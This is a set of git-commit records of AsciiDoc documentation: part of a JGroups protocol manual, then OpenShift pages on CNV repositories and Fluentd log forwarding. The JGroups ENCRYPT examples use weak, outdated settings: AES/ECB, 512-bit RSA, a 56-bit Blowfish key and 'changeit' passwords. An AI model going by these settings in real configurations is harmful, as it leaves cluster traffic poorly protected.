e.g. when multiple members start at the same time, the\noutgoing network buffer might overflow, and the mcast packet might get\ndropped. Nobody receives it and thus the sender will not receive any\nresponses, resulting in an initial membership of 0. This could result in\nmultiple coordinators, and multiple subgroups forming. How can we overcome\nthis problem ? There are two solutions:\n\n. Increase the timeout, or number of responses received. This will\n only help if the reason of the empty membership was a slow host. If\n the mcast packet was dropped, this solution won't help\n. Add the MERGE2 or MERGE3 protocol. This doesn't actually prevent\n multiple initial cordinators, but rectifies the problem by merging\n different subgroups back into one. Note that this might involve state\n merging which needs to be done by the application.\n \n\n\n[[FlowControl]]\n=== Flow control\n\nFlow control takes care of adjusting the rate of a message sender to the rate of the slowest receiver over time.\n If a sender continuously sends messages at a rate that is faster than the receiver(s), the receivers will\n either queue up messages, or the messages will get discarded by the receiver(s), triggering costly\n retransmissions. In addition, there is spurious traffic on the cluster, causing even more retransmissions.\n \n\nFlow control throttles the sender so the receivers are not overrun with messages.\n \n\nNote that flow control can be bypassed by setting message flag Message.NO_FC. See <<MessageFlags>>\n for details.\n \n\nThe properties for FlowControl are shown below and can be used in\n MFC and UFC:\n \n\n${FlowControl}\n\n\n\n==== FC\n\nFC uses a credit based system, where each sender has +$$max_credits$$+ credits and decrements\n them whenever a message is sent. The sender blocks when the credits fall below 0, and only resumes\n sending messages when it receives a replenishment message from the receivers.\n \n\nThe receivers maintain a table of credits for all senders and decrement the given sender's credits\n as well, when a message is received.\n \n\nWhen a sender's credits drops below a threshold, the receiver will send a replenishment message to\n the sender. The threshold is defined by +$$min_bytes$$+ or +$$min_threshold$$+.\n \n\n${FC}\n\n\nNOTE: FC has been deprecated, use MFC and UFC instead\n\n\n==== MFC and UFC\n\nIn 2.10, FC was separated into MFC (Multicast Flow Control) and Unicast Flow Control (UFC). The reason\n was that multicast flow control should not be impeded by unicast flow control, and vice versa. Also,\n performance for the separate implementations could be increased, plus they can be individually omitted.\n For example, if no unicast flow control is needed, UFC can be left out of the stack configuration.\n \n\n[[MFC]]\n\n\n===== MFC\n\nMFC has currently no properties other than those inherited by\n FlowControl (see above).\n \n\n${MFC}\n\n[[UFC]]\n\n\n===== UFC\n\nUFC has currently no properties other than those inherited by\n FlowControl (see above).\n \n\n${UFC}\n\n\n\n=== Fragmentation\n\n\n\n==== FRAG and FRAG2\n\nFRAG and FRAG2 fragment large messages into smaller ones, send the smaller ones, and at the receiver\n side, the smaller fragments will get assembled into larger messages again, and delivered to the\n application. FRAG and FRAG2 work for both unicast and multicast messages.\n \n\nThe difference between FRAG and FRAG2 is that FRAG2 does 1 less copy than FRAG, so it is the recommended\n fragmentation protocol. FRAG serializes a message to know the exact size required (including headers),\n whereas FRAG2 only fragments the payload (excluding the headers), so it is faster.\n \n\nThe properties of FRAG2 are:\n \n\n${FRAG2}\n\nContrary to FRAG, FRAG2 does not need to serialize a message in order to break it into smaller\n fragments: it looks only at the message's buffer, which is a byte array anyway. We assume that the\n size addition for headers and src and dest addresses is minimal when the transport finally has to\n serialize the message, so we add a constant (by default 200 bytes). Because of the efficiency gained by\n not having to serialize the message just to determine its size, FRAG2 is generally recommended over FRAG.\n \n\n\n\n=== Ordering\n\n[[SEQUENCER]]\n\n\n==== SEQUENCER\n\nSEQUENCER provider total order for multicast (=group) messages by forwarding messages to the current\n coordinator, which then sends the messages to the cluster on behalf of the original sender. Because it\n is always the same sender (whose messages are delivered in FIFO order), a global (or total) order\n is established.\n \n\nSending members add every forwarded message M to a buffer and remove M when they receive it. Should\n the current coordinator crash, all buffered messages are forwarded to the new coordinator.\n \n\n${SEQUENCER}\n\n[[TOA]]\n\n\n==== Total Order Anycast (TOA)\n\nA total order anycast is a totally ordered message sent to a subset of the cluster members. TOA\n intercepts messages with an AnycastMessage (carrying a list of addresses) and handles sending of the\n message in total order. Say the cluster is {A,B,C,D,E} and the Anycast is to {B,C}.\n \n\nSkeen's algorithm is used to send the message: B and C each maintain a logical clock (a counter).\n When a message is to be sent, TOA contacts B and C and asks them for their counters. B and C return\n their counters (incrementing them for the next request).\n \n\nThe originator of the message then sets the message's ID to be the max of all returned counters and\n sends the message. Receivers then deliver the messages in order of their IDs.\n \n\nThe main use of TOA is currently in Infinispan's transactional caches with partial replication: it\n is used to apply transactional modifications in total order, so that no two-phase commit protocol\n has to be run and no locks have to be acquired.\n \n\nAs shown in link:$$http:\/\/www.cloudtm.eu\/home\/Publications$$[ \"Exploiting Total Order Multicast in Weakly Consistent Transactional Caches\"], when we have\n many conflicts by different transactions modifying the same keys, TOM fares better than 2PC.\n \n\nNote that TOA is experimental (as of 3.1).\n \n\n${tom.TOA}\n\n[[StateTransferProtocolDetails]]\n\n\n=== State Transfer\n\n[[pbcast.STATE_TRANSFER]]\n\n\n==== pbcast.STATE_TRANSFER\n\nSTATE_TRANSFER is the existing transfer protocol, which transfers byte[] buffers around. However, at the\n state provider's side, JGroups creates an output stream over the byte[] buffer, and passes the\n ouput stream to the getState(OutputStream) callback, and at the state\n requester's side, an input stream is created and passed to the\n setState(InputStream) callback.\n \n\nThis allows us to continue using STATE_TRANSFER, until the new state transfer protocols are going to\n replace it (perhaps in 4.0).\n \n\nIn order to transfer application state to a joining member of a cluster, STATE_TRANSFER has to load\n entire state into memory and send it to a joining member. The major limitation of this approach is that\n for state transfers that are very large this would likely result in memory exhaustion.\n \n\nFor large state transfer use either the STATE or STATE_SOCK protocol. However, if the state is small,\n STATE_TRANSFER is okay.\n \n\n${STATE_TRANSFER}\n\n[[StreamingStateTransfer]]\n\n\n==== StreamingStateTransfer\n\nStreamingStateTransfer is the superclass of STATE and STATE_SOCK (see below).\n Its properties are:\n \n\n${StreamingStateTransfer}\n\n[[pbcast.STATE]]\n\n\n==== pbcast.STATE\n\n\n\n===== Overview\n\nSTATE was renamed from (2.x) STREAMING_STATE_TRANSFER, and refactored to extend a common superclass\n StreamingStateTransfer. The other state transfer protocol extending\n StreamingStateTransfer is STATE_SOCK (see <<STATE_SOCK>>).\n \n\nSTATE uses a _streaming approach_ to state transfer; the\n state provider writes its state to the output stream passed to it in the\n getState(OutputStream) callback, which chunks the stream up into chunks\n that are sent to the state requester in separate messages.\n \n\nThe state requester receives those chunks and feeds them into the input stream from which the\n state is read by the setState(InputStream) callback.\n \n\nThe advantage compared to STATE_TRANSFER is that state provider and requester only need small\n (transfer) buffers to keep a part of the state in memory, whereas STATE_TRANSFER needs to copy\n the _entire_ state into memory.\n \n\nIf we for example have a list of 1 million elements, then STATE_TRANSFER would have to create a\n byte[] buffer out of it, and return the byte[] buffer, whereas a streaming approach could iterate\n through the list and write each list element to the output stream. Whenever the buffer capacity is\n reached, we'd then send a message and the buffer would be reused to receive more data.\n \n\n\n\n===== Configuration\n\nSTATE has currently no properties other than those inherited by\n StreamingStateTransfer (see above).\n \n\n[[pbcast.STATE_SOCK]]\n\n\n==== STATE_SOCK\n\nSTATE_SOCK is also a streaming state transfer protocol, but compared to STATE, it doesn't send the chunks\n as messages, but uses a TCP socket connection between state provider and requester to transfer the state.\n \n\nThe state provider creates a server socket at a configurable bind address and port, and the address\n and port are sent back to a state requester in the state response. The state requester then establishes\n a socket connection to the server socket and passes the socket's input stream to the\n setState(InputStream) callback.\n \n\n\n\n===== Configuration\n\nThe configuration options of STATE_SOCK are listed below:\n \n\n${STATE_SOCK}\n\n[[BARRIER]]\n\n\n==== BARRIER\n\nBARRIER is used by some of the state transfer protocols, as it lets existing threads complete and blocks\n new threads to get both the digest and state in one go.\n \n\nIn 3.1, a new mechanism for state transfer will be implemented, eliminating the need for BARRIER. Until\n then, BARRIER should be used when one of the state transfer protocols is used. BARRIER is\n part of every default stack which contains a state transfer protocol.\n \n\n${BARRIER}\n\n\n\n=== pbcast.FLUSH\n\nFlushing forces group members to send all their pending messages\n prior to a certain event. The process of flushing acquiesces the\n cluster so that state transfer or a join can be done. It is also\n called the stop-the-world model as nobody will be able to send\n messages while a flush is in process. Flush is used in:\n \n\n\nState transfer:: When a member requests state transfer, it tells everyone to\n stop sending messages and waits for everyone's ack. Then it have received everyone's asks,\n the application asks the coordinator for its state and ships it back to the\n requester. After the requester has received and set the state\n successfully, the requester tells everyone to resume sending messages.\nView changes (e.g.a join):: Before installing a new view\n V2, flushing ensures that all messages _sent_ in the\n current view V1 are indeed _delivered_ in V1, rather than in V2\n (in all non-faulty members). This is essentially Virtual Synchrony.\n \n\n\n \n \n\nFLUSH is designed as another protocol positioned just below the\n channel, on top of the stack (e.g. above STATE_TRANSFER). The STATE_TRANSFER and GMS\n protocols request a flush by sending an event up the stack, where\n it is handled by the FLUSH protcol. Another event is sent back by\n the FLUSH protocol to let the caller know that the flush has completed.\n When done (e.g. view was installed or state transferred), the protocol\n sends a message, which will allow everyone in the cluster to resume sending.\n \n\nA channel is notified that the FLUSH phase has been started by\n the Receiver.block() callback. \n \n\nRead more about flushing in <<Flushing>>.\n \n\n${FLUSH}\n\n[[Misc]]\n\n\n=== Misc\n\n[[STATS]]\n\n\n==== Statistics\n\nSTATS exposes various statistics, e.g. number of received multicast and unicast messages, number of\n bytes sent etc. It should be placed directly over the transport\n \n\n${STATS}\n\n[[Security]]\n\n\n==== Security\n\nJGroups provides protocols to encrypt cluster traffic (ENCRYPT), and to make sure that only\n authorized members can join a cluster (AUTH and SASL).\n \n\n[[ENCRYPT]]\n\n\n===== ENCRYPT\n\nA detailed description of ENCRYPT is found in the JGroups source (__JGroups\/doc\/ENCRYPT.html__).\nEncryption by default only encrypts the message body, but doesn't encrypt message headers.\nTo encrypt the entire message (including all headers, plus destination and source addresses),\nthe property ++$$encrypt_entire_message$$++ has to be set to true.\nAlso, ENCRYPT has to be below any protocols whose headers we want to encrypt, e.g.\n\n\n[source,xml]\n----\n<config ... >\n <UDP \/>\n <PING \/>\n <MERGE2 \/>\n <FD \/>\n <VERIFY_SUSPECT \/>\n <pbcast.NAKACK \/>\n <UNICAST \/>\n <pbcast.STABLE \/>\n <FRAG2 \/>\n <pbcast.GMS \/>\n <ENCRYPT encrypt_entire_message=\"false\"\n sym_init=\"128\" sym_algorithm=\"AES\/ECB\/PKCS5Padding\"\n asym_init=\"512\" asym_algorithm=\"RSA\"\/>\n<\/config>\n----\n\nNote that ENCRYPT sits below NAKACK and UNICAST, so the sequence numbers for these 2 protocols will\n be encrypted. Had ENCRYPT been placed below UNICAST but above NAKACK, then only UNICAST's headers\n (including sequence numbers) would have been encrypted, but not NAKACKs.\n \n\nNote that it doesn't make too much sense to place ENCRYPT even lower in the stack, because then\n almost all traffic (even merge or discovery traffic) will be encrypted, which may be somewhat of\n a performance drag.\n \n\nWhen we encrypt an entire message, we have to marshal the message into a byte buffer first and\n then encrypt it. This entails marshalling and copying of the byte buffer, which is not so good\n performance wise...\n \n\n\n\n.Using a key store\nENCRYPT uses store type JCEKS (for details between JKS and JCEKS see here), however\n +keytool+ uses JKS, therefore a keystore generated with keytool will not be accessible.\n \n\nTo generate a keystore compatible with JCEKS, use the following command line options to keytool:\n \n\n\n----\n\nkeytool -genseckey -alias myKey -keypass changeit -storepass changeit -keyalg Blowfish -keysize 56 -keystore defaultStore.keystore -storetype JCEKS\n \n----\n\nENCRYPT could then be configured as follows:\n \n\n\n[source,xml]\n----\n\n<ENCRYPT key_store_name=\"defaultStore.keystore\"\n store_password=\"changeit\"\n alias=\"myKey\"\/>\n \n----\n\nNote that defaultStore.keystore will have to be found in the claspath.\n \n\n\nNOTE: If asymmetric encryption is used (no shared key via keystore), ENCRYPT has to be placed somewhere _above_ GMS,\n or else the JOIN process would not function (as the JOIN response would get dropped).\n\n${ENCRYPT}\n\n[[AUTH]]\n\n\n===== AUTH\n\nAUTH is used to provide a layer of authentication to JGroups. This allows you to define pluggable\n security that defines if a node should be allowed to join a cluster. AUTH sits below the GMS\n protocol and listens for JOIN REQUEST messages. When a JOIN REQUEST is received it tries to find\n an AuthHeader object, inside of which should be an implementation of the AuthToken object.\n \n\nAuthToken is an abstract class, implementations of which are responsible for providing the\n actual authentication mechanism. Some basic implementations of AuthToken are provide in the\n org.jgroups.auth package (SimpleToken, MD5Token and X509Token). Effectivly all these implementations\n do is encrypt a string (found in the jgroups config) and pass that on the JOIN REQUEST.\n \n\nWhen authentication is successful, the message is simply passed up the stack to the GMS protocol.\n When it fails, the AUTH protocol creates a JOIN RESPONSE message with a failure string and passes\n it back down the stack. This failure string informs the client of the reason for failure.\n Clients will then fail to join the group and will throw a SecurityException.\n If this error string is null then authentication is considered to have passed.\n \n\nFor more information refer to the wiki at http:\/\/community.jboss.org\/wiki\/JGroupsAUTH[AUTH].\n \n\n${AUTH}\n\n[[SASL]]\n\n\n===== SASL\n\nSASL is an alternative to the AUTH protocol which provides a layer of authentication to JGroups by allowing the\n use of one of the SASL mechanisms made available by the JDK. SASL sits below the GMS\n protocol and listens for JOIN \/ MERGE REQUEST messages. When a JOIN \/ MERGE REQUEST is received it tries to find\n a SaslHeader object which contains the initial response required by the chosen SASL mech. This initiates a sequence\n of challenge\/response messages which, if successful, culminates in allowing the new node to join the cluster. The actual\n validation logic required by the SASL mech must be provided by the user in the form of a standard javax.security.auth.CallbackHandler\n implementation.\n \n\nWhen authentication is successful, the message is simply passed up the stack to the GMS protocol.\n When it fails, the SASL protocol creates a JOIN \/ MERGE RESPONSE message with a failure string and passes\n it back down the stack. This failure string informs the client of the reason for failure.\n Clients will then fail to join the group and will throw a SecurityException.\n If this error string is null then authentication is considered to have passed.\n \n\nSASL can be (minimally) configured as follows:\n \n\n\n[source,xml]\n----\n\n<config ... >\n <UDP \/>\n <PING \/>\n <pbcast.NAKACK \/>\n <UNICAST3 \/>\n <pbcast.STABLE \/>\n <SASL mech=\"DIGEST-MD5\" \n client_callback_handler=\"org.example.ClientCallbackHandler\" \n server_callback_handler=\"org.example.ServerCallbackHandler\"\/>\n <pbcast.GMS \/>\n \n<\/config>\n \n----\n\nThe +mech+ property specifies the SASL mech you want to use, as defined by RFC-4422. You will also need to provide two\n callback handlers, one used when the node is running as coordinator (++$$server_callback_handler$$++) and one used in all other \n cases (++$$client_callback_handler$$++). Refer to the JDK's SASL reference guide for more details: link:$$http:\/\/docs.oracle.com\/javase\/7\/docs\/technotes\/guides\/security\/sasl\/sasl-refguide.html$$[] \n \nThe JGroups package comes with a simple properties-based CallbackHandler which can be used when a more complex Kerberos\/LDAP approach is not needed. To use this set both the (++$$server_callback_handler$$++) and\n the (++$$client_callback_handler$$++) to org.jgroups.auth.sasl.SimpleAuthorizingCallbackHandler. This CallbackHandler can be configured either programmatically by passing to the constructor an\n instance of java.util.Properties containing the appropriate properties, or via standard Java system properties (i.e. set on the command-line using the -DpropertyName=propertyValue notation.\n The following properties are available:\n\n* sasl.credentials.properties - the path to a property file which contains principal\/credential mappings represented as principal=password\n* sasl.local.principal - the name of the principal that is used to identify the local node. It must exist in the sasl.credentials.properties file\n* sasl.roles.properties - (optional) the path to a property file which contains principal\/roles mappings represented as principal=role1,role2,role3\n* sasl.role - (optional) if present, authorizes joining nodes only if their principal is\n* sasl.realm - (optional) the name of the realm to use for the SASL mechanisms that require it\n\n${SASL}\n\n[[COMPRESS]]\n\n\n==== COMPRESS\n\nCOMPRESS compresses messages larger than +$$min_size$$+, and uncompresses them at the\n receiver's side. Property +$$compression_level$$+ determines how thorough the\n compression algorith should be (0: no compression, 9: highest compression).\n \n\n${COMPRESS}\n\n[[SCOPE]]\n\n\n==== SCOPE\n\nAs discussed in <<Scopes>>, the SCOPE protocol is used to deliver updates\n to different scopes concurrently. It has to be placed somewhere above UNICAST and NAKACK.\n \n\nSCOPE has a separate thread pool. The reason why the default thread pool from the transport wasn't used\n is that the default thread pool has a different purpose. For example, it can use a queue to which all\n incoming messages are added, which would defy the purpose of concurrent delivery in SCOPE. As a matter\n of fact, using a queue would most likely delay messages get sent up into SCOPE!\n \n\nAlso, the default pool's rejection policy might not be \"run\", so the SCOPE implementation would have\n to catch rejection exceptions and engage in a retry protocol, which is complex and wastes resources.\n \n\nThe configuration of the thread pool is shown below. If you expect _concurrent_\n messages to N _different_ scopes, then the max pool size would ideally be set\n to N. However, in most cases, this is not necessary as (a) the messages might not be to different\n scopes or (b) not all N scopes might get messages at the same time. So even if the max pool size is a\n bit smaller, the cost of this is slight delays, in the sense that a message for scope Y might wait until\n the thread processing message for scope X is available.\n \n\nTo remove unused scopes, an expiry policy is provided: expiration_time is the number of milliseconds\n after which an idle scope is removed. An idle scope is a scope which hasn't seen any messages for\n expiration_time milliseconds. The expiration_interval value defines the number of milliseconds at\n which the expiry task runs. Setting both values to 0 disables expiration; it would then have to be\n done manually (see <<Scopes>> for details).\n \n\n${SCOPE}\n\n[[RELAY]]\n\n\n==== RELAY\n\nRELAY bridges traffic between seperate clusters, see <<RelayAdvanced>> for details.\n \n\n${RELAY}\n\n[[RELAY2]]\n\n\n==== RELAY2\n\nRELAY2 provides clustering between different sites (local clusters), for multicast and unicast messages.\n See <<Relay2Advanced>> for details.\n \n\n${RELAY2}\n\n[[STOMP_Protocol]]\n\n\n==== STOMP\n\nSTOMP is discussed in <<STOMP>>. The properties for it are shown below:\n \n\n${STOMP}\n\n[[DAISYCHAIN]]\n\n\n==== DAISYCHAIN\n\nThe DAISYCHAIN protocol is discussed in <<DaisyChaining>>.\n \n\n${DAISYCHAIN}\n\n[[RATE_LIMITER]]\n\n\n==== RATE_LIMITER\n\nRATE_LIMITER can be used to set a limit on the data sent per time unit. When sending data, only\n max_bytes can be sent per time_period milliseconds. E.g. if max_bytes=\"50M\" and time_period=\"1000\", then\n a sender can only send 50MBytes \/ sec max.\n \n\n${RATE_LIMITER}\n\n[[LockingProtocols]]\n==== Locking protocols\n\nThere are currently 2 locking protocols: org.jgroups.protocols.CENTRAL_LOCK and\n org.jgroups.protocols.PEER_LOCK. Both extend Locking, which has the\n following properties:\n \n\n${Locking}\n\n[[CENTRAL_LOCK]]\n\n\n===== CENTRAL_LOCK\n\nCENTRAL_LOCK has the current coordinator of a cluster grants locks, so every node has to communicate\n with the coordinator to acquire or release a lock. Lock requests by different nodes for the same lock\n are processed in the order in which they are received.\n \n\nA coordinator maintains a lock table. To prevent losing the knowledge of who holds which locks, the\n coordinator can push lock information to a number of backups defined by num_backups. If num_backups\n is 0, no replication of lock information happens. If num_backups is greater than 0, then the coordinator\n pushes information about acquired and released locks to all backup nodes. Topology changes might\n create new backup nodes, and lock information is pushed to those on becoming a new backup node.\n \n\nThe advantage of CENTRAL_LOCK is that all lock requests are granted in the same order across\n the cluster, which is not the case with PEER_LOCK.\n \n\n${CENTRAL_LOCK}\n\n[[PEER_LOCK]]\n\n\n===== PEER_LOCK\n\nPEER_LOCK acquires a lock by contacting all cluster nodes, and lock acquisition is only successful\n if all non-faulty cluster nodes (peers) grant it.\n \n\nUnless a total order configuration is used (e.g. org.jgroups.protocols.SEQUENCER based), lock\n requests for the same resource from different senders may be received in different order, so\n deadlocks can occur. Example:\n \n* Nodes A and B\n* A and B call lock(X) at the same time\n* A receives L(X,A) followed by L(X,B): locks X(A), queues L(X,B)\n* B receives L(X,B) followed by L(X,A): locks X(B), queues L(X,A)\n \n\nTo acquire a lock, we need lock grants from both A and B, but this will never happen here.\n To fix this, either add SEQUENCER to the configuration, so that all lock requests are received in\n the same global order at both A and B, or use\n java.util.concurrent.locks.Lock.tryLock(long,javaTimeUnit) with retries if a lock cannot be acquired.\n \n\n${PEER_LOCK}\n\n[[CENTRAL_EXECUTOR]]\n\n\n==== CENTRAL_EXECUTOR\n\nCENTRAL_EXECUTOR is an implementation of Executing which is needed by the ExecutionService.\n \n\n${Executing}\n\n${CENTRAL_EXECUTOR}\n\n[[COUNTER]]\n\n\n==== COUNTER\n\nCOUNTER is the implementation of cluster wide counters, used by the CounterService.\n \n\n${COUNTER}\n\n[[SUPERVISOR]]\n\n\n==== SUPERVISOR\n\nSUPERVISOR is a protocol which runs rules which periodically (or event triggered) check conditions and\n take corrective action if a condition is not met. Example: org.jgroups.protocols.rules.CheckFDMonitor is\n a rule which periodically checks if FD's monitor task is running when the cluster size is > 1. If not,\n the monitor task is started.\n \n\nThe SUPERVISOR is explained in more detail in <<Supervisor>>\n \n\n${SUPERVISOR}\n\n[[FORK]]\n\n\n==== FORK\n\nFORK allows ForkChannels to piggy-back messages on a regular channel. Needs to be placed towards the\n top of the stack. See <<ForkChannel>> for details.\n \n\n${FORK}\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c5c48649187ff3cc255e67f4585cfbdef37a97e","subject":"Updating CNV repo names for 2.3","message":"Updating CNV repo names for 2.3\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cnv-enabling-cnv-repos.adoc","new_file":"modules\/cnv-enabling-cnv-repos.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ cnv_install\/cnv-installing-virtctl.adoc\n\n[id=\"cnv-enabling-cnv-repos_{context}\"]\n= Enabling container-native virtualization repositories\n\nRed Hat offers {CNVProductName} repositories for both Red Hat Enterprise Linux 8\nand Red Hat Enterprise Linux 7:\n\n* Red Hat Enterprise Linux 8 repository: `cnv-2.3-for-rhel-8-x86_64-rpms`\n\n* Red Hat Enterprise Linux 7 repository: `rhel-7-server-cnv-2.3-rpms`\n\nThe process for enabling the repository in `subscription-manager` is the same\nin both platforms.\n\n.Procedure\n\n* Use `subscription manager` to enable the appropriate {CNVProductName} repository for\n your system:\n+\n----\n# subscription-manager repos --enable <repository>\n----\n\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ cnv_install\/cnv-installing-virtctl.adoc\n\n[id=\"cnv-enabling-cnv-repos_{context}\"]\n= Enabling container-native virtualization repositories\n\nRed Hat offers {CNVProductName} repositories for both Red Hat Enterprise Linux 8\nand Red Hat Enterprise Linux 7:\n\n* Red Hat Enterprise Linux 8 repository: `cnv-2.2-for-rhel-8-x86_64-rpms`\n\n* Red Hat Enterprise Linux 7 repository: `rhel-7-server-cnv-2.2-rpms`\n\nThe process for enabling the repository in `subscription-manager` is the same\nin both platforms.\n\n.Procedure\n\n* Use `subscription manager` to enable the appropriate {CNVProductName} repository for\n your system:\n+\n----\n# subscription-manager repos --enable <repository>\n----\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11e6c12ba10d67d7e9c86e87bc5c804105a122d7","subject":"Fix typo in fluentd-server-inecure","message":"Fix typo in fluentd-server-inecure","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cluster-logging-collector-log-forward-fluentd.adoc","new_file":"modules\/cluster-logging-collector-log-forward-fluentd.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-external.adoc\n\n[id=\"cluster-logging-collector-log-forward-fluentd_{context}\"]\n= Forwarding logs using the Fluentd forward protocol\n\nYou can use the Fluentd *forward* protocol to send a copy of your logs to an external log aggregator configured to accept the protocol instead of, or in addition to, the default Elasticsearch log store. You are responsible for configuring the external log aggregator to receive the logs from {product-title}.\n\nTo configure log forwarding using the *forward* protocol, create a `ClusterLogForwarder` Custom Resource (CR) with one or more outputs to the Fluentd servers and pipelines that use those outputs. The Fluentd output can use a TCP (insecure) or TLS (secure TCP) connection.\n\n[NOTE]\n====\nAlternately, you can use a ConfigMap to forward logs using the *forward* protocols. However, this method is deprecated in {product-title} and will be removed in a future release.\n====\n\n.Procedure\n\n. Create a `ClusterLogForwarder` CR YAML file similar to the following:\n+\n[source,yaml]\n----\napiVersion: logging.openshift.io\/v1\nkind: ClusterLogForwarder\nmetadata:\n name: instance <1>\n namespace: openshift-logging <2>\nspec:\n outputs:\n - name: fluentd-server-secure <3>\n type: fluentdForward <4>\n url: 'tls:\/\/fluentdserver.security.example.com:24224' <5>\n secret: <6>\n name: fluentd-secret\n - name: fluentd-server-insecure\n type: fluentdForward\n url: 'tcp:\/\/fluentdserver.home.example.com:24224'\n pipelines:\n - name: forward-to-fluentd-secure <7>\n inputRefs: <8>\n - application\n - audit\n outputRefs:\n - fluentd-server-secure <9>\n - default <10>\n labels:\n clusterId: C1234 <11>\n - name: forward-to-fluentd-insecure <12>\n inputRefs:\n - infrastructure\n outputRefs:\n - fluentd-server-insecure\n labels:\n clusterId: C1234\n----\n<1> The name of the `ClusterLogForwarder` CR must be `instance`.\n<2> The namespace for the log forwarding CR must be `openshift-logging`.\n<3> Specify a name for the output.\n<4> Specify the `fluentdForward` type.\n<5> Specify the URL and port of the external Fluentd instance as a valid absolute URL. You can use the `tcp` (insecure) or `tls` (secure TCP) protocol. If the cluster-wide proxy using the CIDR annotation is enabled, the output must be a server name or FQDN, not an IP address.\n<6> If using a `tls` prefix, you must specify the name of the secret required by the endpoint for TLS communication. The secret must exist in the `openshift-logging` project and must have keys of: *tls.crt*, *tls.key*, and *ca-bundle.crt* that point to the respective certificates that they represent.\n<7> Optional. Specify a name for the pipeline.\n<8> Specify which log types should be forwarded using that pipeline: `application,` `infrastructure`, or `audit`.\n<9> Specify the output to use with that pipeline for forwarding the logs.\n<10> Optional. Specify the `default` output to forward logs to the internal Elasticsearch instance.\n<11> Optional. One or more labels to add to the logs.\n<12> Optional: Configure multiple outputs to forward logs to other external log aggregtors of any supported type:\n** Optional. A name to describe the pipeline.\n** The `inputRefs` is the log type to forward using that pipeline: `application,` `infrastructure`, or `audit`.\n** The `outputRefs` is the name of the output to use.\n** Optional: One or more labels to add to the logs.\n\n. Create the CR object:\n+\n[source,terminal]\n----\n$ oc create -f <file-name>.yaml\n----\n\nThe Cluster Logging Operator redeploys the Fluentd pods. If the pods do not redeploy, you can delete the Fluentd\npods to force them to redeploy.\n\n[source,terminal]\n----\n$ oc delete pod --selector logging-infra=fluentd\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-external.adoc\n\n[id=\"cluster-logging-collector-log-forward-fluentd_{context}\"]\n= Forwarding logs using the Fluentd forward protocol\n\nYou can use the Fluentd *forward* protocol to send a copy of your logs to an external log aggregator configured to accept the protocol instead of, or in addition to, the default Elasticsearch log store. You are responsible for configuring the external log aggregator to receive the logs from {product-title}.\n\nTo configure log forwarding using the *forward* protocol, create a `ClusterLogForwarder` Custom Resource (CR) with one or more outputs to the Fluentd servers and pipelines that use those outputs. The Fluentd output can use a TCP (insecure) or TLS (secure TCP) connection.\n\n[NOTE]\n====\nAlternately, you can use a ConfigMap to forward logs using the *forward* protocols. However, this method is deprecated in {product-title} and will be removed in a future release.\n====\n\n.Procedure\n\n. Create a `ClusterLogForwarder` CR YAML file similar to the following:\n+\n[source,yaml]\n----\napiVersion: logging.openshift.io\/v1\nkind: ClusterLogForwarder\nmetadata:\n name: instance <1>\n namespace: openshift-logging <2>\nspec:\n outputs:\n - name: fluentd-server-secure <3>\n type: fluentdForward <4>\n url: 'tls:\/\/fluentdserver.security.example.com:24224' <5>\n secret: <6>\n name: fluentd-secret\n - name: fluentd-server-inecure\n type: fluentdForward\n url: 'tcp:\/\/fluentdserver.home.example.com:24224'\n pipelines:\n - name: forward-to-fluentd-secure <7>\n inputRefs: <8>\n - application\n - audit\n outputRefs:\n - fluentd-server-secure <9>\n - default <10>\n labels:\n clusterId: C1234 <11>\n - name: forward-to-fluentd-insecure <12>\n inputRefs:\n - infrastructure\n outputRefs:\n - fluentd-server-insecure\n labels:\n clusterId: C1234\n----\n<1> The name of the `ClusterLogForwarder` CR must be `instance`.\n<2> The namespace for the log forwarding CR must be `openshift-logging`.\n<3> Specify a name for the output.\n<4> Specify the `fluentdForward` type.\n<5> Specify the URL and port of the external Fluentd instance as a valid absolute URL. You can use the `tcp` (insecure) or `tls` (secure TCP) protocol. If the cluster-wide proxy using the CIDR annotation is enabled, the output must be a server name or FQDN, not an IP address.\n<6> If using a `tls` prefix, you must specify the name of the secret required by the endpoint for TLS communication. The secret must exist in the `openshift-logging` project and must have keys of: *tls.crt*, *tls.key*, and *ca-bundle.crt* that point to the respective certificates that they represent.\n<7> Optional. Specify a name for the pipeline.\n<8> Specify which log types should be forwarded using that pipeline: `application,` `infrastructure`, or `audit`.\n<9> Specify the output to use with that pipeline for forwarding the logs.\n<10> Optional. Specify the `default` output to forward logs to the internal Elasticsearch instance.\n<11> Optional. One or more labels to add to the logs.\n<12> Optional: Configure multiple outputs to forward logs to other external log aggregtors of any supported type:\n** Optional. A name to describe the pipeline.\n** The `inputRefs` is the log type to forward using that pipeline: `application,` `infrastructure`, or `audit`.\n** The `outputRefs` is the name of the output to use.\n** Optional: One or more labels to add to the logs.\n\n. Create the CR object:\n+\n[source,terminal]\n----\n$ oc create -f <file-name>.yaml\n----\n\nThe Cluster Logging Operator redeploys the Fluentd pods. If the pods do not redeploy, you can delete the Fluentd\npods to force them to redeploy.\n\n[source,terminal]\n----\n$ oc delete pod --selector logging-infra=fluentd\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3eb4421bf88b556223218cf4229f31a96fee435e","subject":"INFUND-7046 Correcting Asciidoc.","message":"INFUND-7046 Correcting Asciidoc.\n\n\nFormer-commit-id: be125c06d4f44698136035be9da53efb388c217d","repos":"InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service","old_file":"ifs-data-service\/src\/docs\/asciidoc\/application-assessment-summary.adoc","new_file":"ifs-data-service\/src\/docs\/asciidoc\/application-assessment-summary.adoc","new_contents":"=== Get ApplicationAssessmentSummary by 